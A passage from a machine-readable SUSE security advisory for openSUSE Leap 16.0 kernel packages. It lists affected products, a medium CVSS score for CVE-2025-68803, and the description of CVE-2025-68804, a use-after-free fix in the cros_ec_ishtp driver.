"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68803"
},
{
"cve": "CVE-2025-68804",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68804"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver\n\nAfter unbinding the driver, another kthread `cros_ec_console_log_work`\nis still accessing the device, resulting an UAF and crash.\n\nThe driver doesn\u0027t unregister the EC device in .remove() which should\nshutdown sub-devices synchronously. Fix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
